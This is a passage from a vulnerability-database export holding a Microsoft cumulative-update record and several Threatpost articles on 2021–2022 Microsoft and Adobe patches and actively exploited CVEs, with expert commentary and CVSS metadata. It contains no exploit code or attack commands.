If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5009616. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:You **must **install the May 11, 2021 servicing stack update (SSU) (KB5003243) or the latest SSU (KB5005112) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005030>) website. 
\nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005030](<https://download.microsoft.com/download/3/f/c/3fc996a5-7267-4a7c-9a5b-83ade06204dc/5005030.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005030 (OS Build 17763.2114)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36942", "CVE-2021-36948"], "modified": "2021-08-10T07:00:00", "id": "KB5005030", "href": "https://support.microsoft.com/en-us/help/5005030", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2022-07-18T12:20:51", "description": "A Windows 11 vulnerability, part of Microsoft\u2019s Patch Tuesday roundup of fixes, is being exploited in the wild, prompting the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) to advise patching of the elevation of privilege flaw by August 2.\n\nThe recommendation is directed at federal agencies and concerns [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22047>), a vulnerability that carries a CVSS score of 7.8 (High) and exposes the Windows Client Server Runtime Subsystem (CSRSS) used in Windows 11 (and earlier versions dating back to 7) and also Windows Server 2022 (and earlier versions 2008, 2012, 2016 and 2019) to attack.\n\n_[[**FREE On-demand Event**](<https://threatpost.com/webinars/securely-access-your-machines-from-anywhere-presented-by-keeper-security/>): **Join Keeper Security\u2019s Zane Bond in a Threatpost roundtable and learn how to securely access your machines from anywhere and share sensitive documents from your home office.** **[WATCH HERE](<https://threatpost.com/webinars/securely-access-your-machines-from-anywhere-presented-by-keeper-security/>)**.]_\n\nThe CSRSS bug is an elevation of privilege vulnerability: an adversary who already has a foothold on the targeted system as an unprivileged user can use it to execute code as SYSTEM. When the bug was first reported by Microsoft\u2019s own security team earlier this month it was classified as a zero-day, a bug being exploited before a patch existed. That patch was made available on [Tuesday July 5](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22047>).\n\nResearchers at FortiGuard Labs, a division of Fortinet, said the threat the bug poses to business is \u201cmedium\u201d. 
[In a bulletin, researchers explain](<https://www.fortiguard.com/threat-signal-report/4671/known-active-exploitation-of-windows-csrss-elevation-of-privilege-vulnerability-cve-2022-22047>) the downgraded rating because an adversary needs advanced \u201clocal\u201d or physical access to the targeted system to exploit the bug and a patch is available.\n\nThat said, an attacker who has previously gained remote access to a computer system (via malware infection) could exploit the vulnerability remotely.\n\n\u201cAlthough there is no further information on exploitation released by Microsoft, it can be surmised that an unknown remote code execution allowed for an attacker to perform lateral movement and escalate privileges on machines vulnerable to CVE-2022-22047, ultimately allowing for SYSTEM privileges,\u201d FortiGuard Labs wrote.\n\n## Office and Adobe Documents Entry Points\n\nWhile the vulnerability is being actively exploited, there are no known public proof of concept exploits in the wild that can be used to help mitigate or sometimes fuel attacks, according to a [report by The Record](<https://therecord.media/cisa-adds-windows-bug-to-exploited-list-urges-agencies-to-patch-by-august-2/>).\n\n\u201cThe vulnerability allows an attacker to execute code as SYSTEM, provided they can execute other code on the target,\u201d wrote Trend Micro\u2019s [Zero Day Initiative (ZDI) in its Patch Tuesday](<https://www.zerodayinitiative.com/blog/2022/7/12/the-july-2022-security-update-review>) roundup last week.\n\n\u201cBugs of this type are typically paired with a code execution bug, usually a specially crafted Office or Adobe document, to take over a system. 
These attacks often rely on macros, which is why so many were disheartened to hear Microsoft\u2019s delay in blocking all Office macros by default,\u201d wrote ZDI author Dustin Childs.\n\nMicrosoft recently said it would block the use of Visual Basic for Applications (VBA) macros by default in some of its Office apps, but set no timeline to enforce the policy.\n\nCISA [added the Microsoft bug to its running list](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) of known exploited vulnerabilities on July 7 (search \u201cCVE-2022-22047\u201d to find the entry) and recommends simply, \u201capply updates per vendor instructions\u201d.\n\nImage: Courtesy of Microsoft\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-18T12:19:26", "type": "threatpost", "title": "CISA Urges Patch of Exploited Windows 11 Bug by Aug. 
2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2022-07-18T12:19:26", "id": "THREATPOST:781705ADC10B0D40FC4B8D835FA5EA6D", "href": "https://threatpost.com/cisa-urges-patch-11-bug/180235/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-08T22:18:00", "description": "Microsoft jumped on 50 vulnerabilities in this month\u2019s [Patch Tuesday update](<https://msrc.microsoft.com/update-guide>), issuing fixes for CVEs in Microsoft Windows, .NET Core and Visual Studio, Microsoft Office, Microsoft Edge (Chromium-based and EdgeHTML), SharePoint Server, Hyper-V, Visual Studio Code \u2013 Kubernetes Tools, Windows HTML Platform, and Windows Remote Desktop.\n\nFive of the CVEs are rated Critical and 45 are rated Important in severity. Microsoft reported that six of the bugs are currently under active attack, while three are publicly known at the time of release.\n\nThe number might seem light \u2013 it represents six fewer patches than Microsoft [released in May](<https://threatpost.com/wormable-windows-bug-dos-rce/166057/>) \u2013 but the number of critical vulnerabilities ticked up to five month-over-month.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThose actively exploited vulnerabilities can enable an attacker to hijack a system. 
They have no workarounds, so some security experts are recommending that they be patched as the highest priority.\n\nThe six CVEs under active attack in the wild include four elevation of privilege vulnerabilities, one information disclosure vulnerability and one remote code execution (RCE) vulnerability.\n\n## Critical Bugs of Note\n\n[CVE-2021-31985](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31985>) is a critical RCE vulnerability in Microsoft\u2019s Defender antimalware software that should grab attention. A similar, critical bug in Defender was [patched in January](<https://threatpost.com/critical-microsoft-defender-bug-exploited/162992/>). The most serious of the year\u2019s first Patch Tuesday, that earlier Defender bug was an RCE vulnerability that came under active exploit.\n\nAnother critical flaw is [CVE-2021-31963](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31963>), a Microsoft SharePoint Server RCE vulnerability. Jay Goodman, director of product marketing at Automox, said in a [blog post](<https://blog.automox.com/automox-experts-weigh-in-june-patch-tuesday-2021>) that an attacker exploiting this vulnerability \u201ccould take control of a system where they would be free to install programs, view or change data, or create new accounts on the target system with full user rights.\u201d\n\nWhile Microsoft reports that this vulnerability is less likely to be exploited, Goodman suggested that organizations don\u2019t let it slide: \u201cPatching critical vulnerabilities in the 72-hour window before attackers can weaponize is an important first step to maintaining a safe and secure infrastructure,\u201d he observed.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/06/08141612/Sophos-impact-chart-June-21-patch-Tuesday-e1623176186946.png>)\n\nA year-to-date summary of 2021 Microsoft vulnerability releases as of June. 
Source: Sophos\n\n## Bugs Exploited in the Wild\n\nMicrosoft fixed a total of seven zero-day vulnerabilities. One was [CVE-2021-31968](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31968>), a Windows Remote Desktop Services Denial of Service Vulnerability that was publicly disclosed but hasn\u2019t been seen in attacks. It was issued a CVSS score of 7.5.\n\nThese are the six flaws that Microsoft said are under active attack, all of them also zero days.\n\n * [CVE-2021-31955](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31955>) \u2013 Windows Kernel Information Disclosure Vulnerability. Rating: Important. CVSS 5.5\n * [CVE-2021-31956](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31956>) \u2013 Windows NTFS Elevation of Privilege Vulnerability. Rating: Important. CVSS 7.8\n * [CVE-2021-33739](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33739>) \u2013 Microsoft DWM Core Library Elevation of Privilege Vulnerability. Rating: Important. CVSS 8.4\n * [CVE-2021-33742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-33742>) \u2013 Windows MSHTML Platform Remote Code Execution Vulnerability. Rating: **Critical**. CVSS 7.5\n * [CVE-2021-31199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31199>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2\n * [CVE-2021-31201](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-31201>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability. Rating: Important. CVSS 5.2\n\n## CVE-2021-33742\n\nThis RCE vulnerability lies in MSHTML, the Trident rendering engine that Internet Explorer uses to parse and display web content. The bug could allow an attacker to execute code on a target system if a user views specially crafted web content. 
The [Zero Day Initiative](<https://www.zerodayinitiative.com/blog/2021/6/8/the-june-2021-security-update-review>)\u2018s (ZDI\u2019s) Dustin Childs noted in his Patch Tuesday analysis that since the vulnerability is in the Trident (MSHTML) engine itself, many different applications are affected, not just Internet Explorer. \u201cIt\u2019s not clear how widespread the active attacks are, but considering the vulnerability impacts all supported Windows versions, this should be at the top of your test and deploy list,\u201d he recommended.\n\nThe vulnerability doesn\u2019t require special privilege to exploit, though the attack complexity is high, if that\u2019s any consolation. An attacker would need to do some extra legwork to pull it off, noted Satnam Narang, staff research engineer at Tenable, in an email to Threatpost on Tuesday.\n\nImmersive Labs\u2019 Kevin Breen, director of cyber threat research, noted that visiting a website in a vulnerable browser is \u201ca simple way for attackers to deliver this exploit.\u201d He told Threatpost via email on Tuesday that since the library is used by other services and applications, \u201cemailing HTML files as part of a phishing campaign is also a viable method of delivery.\u201d\n\n[Sophos decreed](<https://news.sophos.com/en-us/2021/06/08/six-in-the-wild-exploits-patched-in-microsofts-june-security-fix-release/>) this one to be the top concern of this month\u2019s crop, given that it\u2019s already being actively exploited by malicious actors.\n\n## CVE-2021-31955, CVE-2021-31956: Used in PuzzleMaker Targeted Malware\n\nCVE-2021-31955 is an information disclosure vulnerability in the Windows Kernel, while CVE-2021-31956 is an elevation of privilege vulnerability in Windows NTFS. The ZDI\u2019s Childs noted that CVE-2021-31956 was reported by the same researcher who found CVE-2021-31955, an information disclosure bug also listed as under active attack. 
They could be linked, he suggested: \u201cIt\u2019s possible these bugs were used in conjunction, as that is a common technique \u2013 use a memory leak to get the address needed to escalate privileges. These bugs are important on their own and could be even worse when combined. Definitely prioritize the testing and deployment of these patches.\u201d\n\nHe was spot-on. On Tuesday, Kaspersky announced that its researchers had discovered a highly targeted malware campaign launched in April against multiple companies, in which a previously unknown threat actor used a chain of Chrome and Windows zero-day exploits: Namely, these two.\n\nIn a press release, Kaspersky said that one of the exploits was used for RCE in the Google Chrome web browser, while the other was an elevation of privilege exploit fine-tuned to target \u201cthe latest and most prominent builds\u201d of Windows 10.\n\n\u201cRecent months have seen a wave of advanced threat activity exploiting zero-days in the wild,\u201d according to the release. \u201cIn mid-April, Kaspersky experts discovered yet a new series of highly targeted exploit attacks against multiple companies that allowed the attackers to stealthily compromise the targeted networks.\u201d\n\nKaspersky hasn\u2019t yet found a connection between these attacks and any known threat actors, so it\u2019s gone ahead and dubbed the actor PuzzleMaker. It said that all the attacks were conducted through Chrome and used an exploit that allowed for RCE. 
Kaspersky researchers weren\u2019t able to retrieve the code for the exploit, but the timeline and availability suggests the attackers were using the now-patched [CVE-2021-21224](<https://www.cvedetails.com/cve/CVE-2021-21224>) vulnerability in Chrome and Chromium browsers that allows attackers to exploit the Chrome renderer process (the processes that are responsible for what happens inside users\u2019 tabs).\n\nKaspersky experts did find and analyze the second exploit, however: An elevation of privilege exploit that exploits two distinct vulnerabilities in the Microsoft Windows OS kernel: CVE-2021-31955 and CVE-2021-31956. The CVE-2021-31955 bug \u201cis affiliated with SuperFetch, a feature first introduced in Windows Vista that aims to reduce software loading times by pre-loading commonly used applications into memory,\u201d they explained.\n\nThe second flaw, CVE-2021-31956, is an Elevation of Privilege vulnerability and heap-based buffer overflow. Kaspersky said that attackers used this vulnerability alongside Windows Notification Facility (WNF) \u201cto create arbitrary memory read/write primitives and execute malware modules with system privileges.\u201d\n\n\u201cOnce the attackers have used both the Chrome and Windows exploits to gain a foothold in the targeted system, the stager module downloads and executes a more complex malware dropper from a remote server,\u201d they continued. \u201cThis dropper then installs two executables, which pretend to be legitimate files belonging to Microsoft Windows OS. 
The second of these two executables is a remote shell module, which is able to download and upload files, create processes, sleep for certain periods of time, and delete itself from the infected system.\u201d\n\nBoris Larin, senior security researcher with Kaspersky\u2019s Global Research and Analysis Team (GReAT), said that the team hasn\u2019t been able to link these highly targeted attacks to any known threat actor: Hence the name PuzzleMaker and the determination to closely monitor the security landscape \u201cfor future activity or new insights about this group,\u201d he was quoted as saying in the press release.\n\nIf the current trend is any indication, expect to see more of the same, Larin said. \u201cOverall, of late, we\u2019ve been seeing several waves of high-profile threat activity being driven by zero-day exploits,\u201d he said. \u201cIt\u2019s a reminder that zero days continue to be the most effective method for infecting targets. Now that these vulnerabilities have been made publicly known, it\u2019s possible that we\u2019ll see an increase of their usage in attacks by this and other threat actors. That means it\u2019s very important for users to download the latest patch from Microsoft as soon as possible.\u201d\n\n## CVE-2021-31199/CVE-2021-31201\n\nThe two Enhanced Cryptographic Provider Elevation of Privilege vulnerabilities are linked to the Adobe Reader bug that [came under active attack](<https://threatpost.com/adobe-zero-day-bug-acrobat-reader/166044/>) last month (CVE-2021-28550), ZDI explained. \u201cIt\u2019s common to see privilege escalation paired with code execution bugs, and it seems these two vulnerabilities were the privilege escalation part of those exploits,\u201d he explained. 
\u201cIt is a bit unusual to see a delay between patch availability between the different parts of an active attack, but good to see these holes now getting closed.\u201d\n\n## CVE-2021-33739\n\nBreen noted that privilege escalation vulnerabilities such as this one in the Microsoft DWM Core Library are just as valuable to attackers as RCEs. \u201cOnce they have gained an initial foothold, they can move laterally across the network and uncover further ways to escalate to system or domain-level access,\u201d he said. \u201cThis can be hugely damaging in the event of ransomware attacks, where high privileges can enable the attackers to stop or destroy backups and other security tools.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook, ****_\u201c_**[**_2021: The Evolution of Ransomware_**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)**_,\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. 
Get the whole story and **[**DOWNLOAD**](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)** the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-06-08T21:45:12", "type": "threatpost", "title": "Microsoft Patch Tuesday Fixes 6 In-The-Wild Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21224", "CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31963", "CVE-2021-31968", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-08T21:45:12", "id": "THREATPOST:61CC1EAC83030C2B053946454FE77AC3", "href": "https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-11T18:51:27", "description": "Adobe is warning customers of a critical zero-day bug actively exploited in the wild that affects its ubiquitous Adobe Acrobat PDF reader software. 
A patch is available, as part of the company\u2019s Tuesday roundup of 43 fixes for 12 of its products, including [Adobe Creative Cloud Desktop Application](<https://helpx.adobe.com/security/products/creative-cloud/apsb21-31.html>), [Illustrator](<https://helpx.adobe.com/security/products/illustrator/apsb21-24.html>), [InDesign](<https://helpx.adobe.com/security/products/indesign/apsb21-22.html>), and [Magento](<https://helpx.adobe.com/security/products/magento/apsb21-30.html>).\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nAccording to Adobe, the zero-day vulnerability, which is tracked as [CVE-2021-28550](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>), \u201chas been exploited in the wild in limited attacks targeting [Adobe Reader](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>) users on Windows.\u201d\n\nWindows users of Adobe Reader may be the only ones currently targeted. However, the bug affects eight versions of the software, including those running on Windows and macOS systems. Versions include:\n\n * Windows Acrobat DC & Reader DC (versions 2021.001.20150 and earlier)\n * macOS Acrobat DC & Reader DC (versions 2021.001.20149 and earlier)\n * Windows & macOS Acrobat 2020 & Acrobat Reader 2020 (2020.001.30020 and earlier versions)\n * Windows & macOS Acrobat 2017 & Acrobat Reader 2017 (2017.011.30194 and earlier versions)\n\nAdobe did not release technical specifics regarding the zero-day vulnerability. 
Typically, those details become available after users have had an opportunity to apply the fix. \u201cUsers can update their product installations manually by choosing Help > Check for Updates,\u201d Adobe wrote in its [May security bulletin, posted Tuesday](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>).\n\n## **May Adobe Update Fixes Multiple Critical Bugs **\n\nAlso part of Tuesday\u2019s roundup of 43 fixes are several other bugs rated critical. In all, Adobe Acrobat received [10 critical and four important vulnerability patches](<https://helpx.adobe.com/security/products/acrobat/apsb21-29.html>). Seven out of those bugs included arbitrary code execution bugs. Three (CVE-2021-21044, CVE-2021-21038, CVE-2021-21086) of the vulnerabilities patched on Tuesday open systems up to out-of-bounds write attacks.\n\nAdobe Illustrator received the next highest number of patches on Tuesday, with five critical code execution vulnerabilities fixed. According to Adobe\u2019s description of the flaws, three (CVE-2021-21103, CVE-2021-21104, CVE-2021-21105) are memory corruption bugs that open systems up to hackers, triggering arbitrary code execution on targeted systems. 
Kushal Arvind Shah, a bug hunter with Fortinet\u2019s FortiGuard Labs, is credited for the three memory corruption bugs.\n\nAdditional Adobe products receiving patches included [Adobe Animate](<https://helpx.adobe.com/security/products/animate/apsb21-35.html>), [Adobe Medium](<https://helpx.adobe.com/security/products/medium/apsb21-34.html>), [Adobe After Effects](<https://helpx.adobe.com/security/products/after_effects/apsb21-33.html>), [Adobe Media Encoder](<https://helpx.adobe.com/security/products/media-encoder/apsb21-32.html>), [Adobe Genuine Service](<https://helpx.adobe.com/security/products/integrity_service/apsb21-27.html>) and [Adobe InCopy](<https://helpx.adobe.com/security/products/incopy/apsb21-25.html>).\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. 
Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n", "cvss3": {}, "published": "2021-05-11T18:38:36", "type": "threatpost", "title": "Hackers Leverage Adobe Zero-Day Bug Impacting Acrobat Reader", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21038", "CVE-2021-21044", "CVE-2021-21086", "CVE-2021-21103", "CVE-2021-21104", "CVE-2021-21105", "CVE-2021-28550"], "modified": "2021-05-11T18:38:36", "id": "THREATPOST:474207FB444B779CD6B86ABEA0D24054", "href": "https://threatpost.com/adobe-zero-day-bug-acrobat-reader/166044/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-11T19:56:07", "description": "Microsoft has patched 51 security vulnerabilities in its scheduled August Patch Tuesday update, including seven critical bugs, two issues that were publicly disclosed but unpatched until now, and one that\u2019s listed as a zero-day that has been exploited in the wild.\n\nOf note, there are 17 elevation-of-privilege (EoP) vulnerabilities, 13 remote code-execution (RCE) issues, eight information-disclosure flaws and two denial-of-service (DoS) bugs.\n\nThe update also includes patches for three more Print Spooler bugs, familiar from the PrintNightmare saga.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/>)\n\n\u201cFortunately, it was a lighter month than usual,\u201d said Eric Feldman, senior product marketing manager at Automox, in a [Patch Tuesday analysis](<https://blog.automox.com/automox-experts-weigh-in-august-patch-tuesday-2021>) from the vendor. \u201cThis represents a 56 percent reduction in overall vulnerabilities from July, and 33 percent fewer vulnerabilities on average for each month so far this year. 
We have also seen a similar reduction in critical vulnerabilities this month, with 30 percent less compared to the monthly average.\u201d\n\n## **Windows Critical Security Vulnerabilities**\n\nThe seven critical bugs [addressed in August](<https://msrc.microsoft.com/update-guide/>) are as follows:\n\n * CVE-2021-26424 \u2013 Windows TCP/IP RCE Vulnerability\n * CVE-2021-26432 \u2013 Windows Services for NFS ONCRPC XDR Driver RCE Vulnerability\n * CVE-2021-34480 \u2013 Scripting Engine Memory Corruption Vulnerability\n * CVE-2021-34530 \u2013 Windows Graphics Component RCE Vulnerability\n * CVE-2021-34534 \u2013 Windows MSHTML Platform RCE Vulnerability\n * CVE-2021-34535 \u2013 Remote Desktop Client RCE Vulnerability\n * CVE-2021-36936 \u2013 Windows Print Spooler RCE Vulnerability\n\nThe bug tracked as **CVE-2021-26424** exists in the TCP/IP protocol stack identified in Windows 7 and newer Microsoft operating systems, including servers.\n\n\u201cDespite its CVSS rating of 9.9, this may prove to be a trivial bug, but it\u2019s still fascinating,\u201d said Dustin Childs of Trend Micro\u2019s Zero Day Initiative (ZDI) in his [Tuesday analysis](<https://www.zerodayinitiative.com/blog/2021/8/10/the-august-2021-security-update-review>). \u201cAn attacker on a guest Hyper-V OS could execute code on the host Hyper-V server by sending a specially crafted IPv6 ping. This keeps it out of the wormable category. Still, a successful attack would allow the guest OS to completely take over the Hyper-V host. 
While not wormable, it\u2019s still cool to see new bugs in new scenarios being found in protocols that have been around for years.\u201d\n\nThe next bug, **CVE-2021-26432** in Windows Services, is more likely to be exploited given its low complexity status, according to Microsoft\u2019s advisory; it doesn\u2019t require privileges or user interaction to exploit, but Microsoft offered no further details.\n\n\u201cThis may fall into the \u2018wormable\u2019 category, at least between servers with NFS installed, especially since the open network computing remote procedure call (ONCRPC) consists of an External Data Representation (XDR) runtime built on the Winsock Kernel (WSK) interface,\u201d Childs said. \u201cThat certainly sounds like elevated code on a listening network service. Don\u2019t ignore this patch.\u201d\n\nAleks Haugom, product marketing manager at Automox, added, \u201cExploitation results in total loss of confidentiality across all devices managed by the same security authority. Furthermore, attackers can utilize it for denial-of-service attacks or to maliciously modify files. So far, no further details have been divulged by Microsoft or the security researcher (Liubenjin from Codesafe Team of Legendsec at Qi\u2019anxin Group) that discovered this vulnerability. Given the broad potential impact, its label \u2018Exploitation More Likely\u2019 and apparent secrecy, patching should be completed ASAP.\u201d\n\nMeanwhile, the memory-corruption bug (**CVE-2021-34480**) arises from how the scripting engine handles objects in memory, and it also allows RCE. Using a web-based attack or a malicious file, such as a malicious landing page or phishing email, attackers can use this vulnerability to take control of an affected system, install programs, view or change data, or create new user accounts with full user rights.\n\n\u201cCVE-2021-34480 should also be a priority,\u201d Kevin Breen, director of cyber-threat research at Immersive Labs, told Threatpost. 
\u201cIt is a low score in terms of CVSS, coming in at 6.8, but has been marked by Microsoft as \u2018Exploitation More Likely\u2019 because it is the type of attack commonly used to increase the success rate of spear phishing attacks to gain network access. Simple, but effective.\u201d\n\nThe Windows Graphic Component bug (**CVE-2021-34530**) allows attackers to remotely execute malicious code in the context of the current user, according to Microsoft \u2013 if they can social-engineer a target into opening a specially crafted file.\n\nAnother bug exists in the Windows MSHTML platform, also known as Trident (**CVE-2021-34534**). Trident is the rendering engine (mshtml.dll) used by Internet Explorer. The bug affects many Windows 10 versions (1607, 1809,1909, 2004, 20H2, 21H1) as well as Windows Server 2016 and 2019.\n\nBut while it potentially affects a large number of users, exploitation is not trivial.\n\n\u201cTo exploit, a threat actor would need to pull off a highly complex attack with user interaction \u2013 still entirely possible with the sophisticated attackers of today,\u201d said Peter Pflaster, technical product marketing manager at Automox.\n\nThe bug tracked as **CVE-2021-34535** impacts the Microsoft Remote Desktop Client, Microsoft\u2019s nearly ubiquitous utility for connecting to remote PCs.\n\n\u201cWith today\u2019s highly dispersed workforce, CVE-2021-34535, an RCE vulnerability in Remote Desktop Clients, should be a priority patch,\u201d said Breen. \u201cAttackers increasingly use RDP access as the tip of the spear to gain network access, often combining it with privilege escalation to move laterally. 
These can be powerful as, depending on the method, it may allow the attacker to authenticate in the network in the same way a user would, making detection difficult.\u201d\n\nIt\u2019s not as dangerous of a bug [as BlueKeep,](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) according to Childs, which also affected RDP.\n\n\u201cBefore you start having flashbacks to BlueKeep, this bug affects the RDP client and not the RDP server,\u201d he said. \u201cHowever, the CVSS 9.9 bug is nothing to ignore. An attacker can take over a system if they can convince an affected RDP client to connect to an RDP server they control. On Hyper-V servers, a malicious program running in a guest VM could trigger guest-to-host RCE by exploiting this vulnerability in the Hyper-V Viewer. This is the more likely scenario and the reason you should test and deploy this patch quickly.\u201d\n\n## **Windows Print Spooler Bugs \u2013 Again**\n\nThe final critical bug is **CVE-2021-36936**, a Windows Print Spooler RCE bug that\u2019s listed as publicly known.\n\nPrint Spooler made headlines last month, when Microsoft patched what it thought was a minor elevation-of-privilege vulnerability in the service (CVE-2021-1675). But the listing was updated later in the week, after researchers from Tencent and NSFOCUS TIANJI Lab figured out it could be used for RCE \u2013 [requiring a new patch](<https://threatpost.com/microsoft-emergency-patch-printnightmare/167578/>).\n\nIt also disclosed a second bug, similar to PrintNightmare (CVE-2021-34527); and a third, [an EoP issue](<https://threatpost.com/microsoft-unpatched-bug-windows-print-spooler/167855/>) ([CVE-2021-34481](<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>)).\n\n\u201cAnother month, another remote code-execution bug in the Print Spooler,\u201d said ZDI\u2019s Childs. 
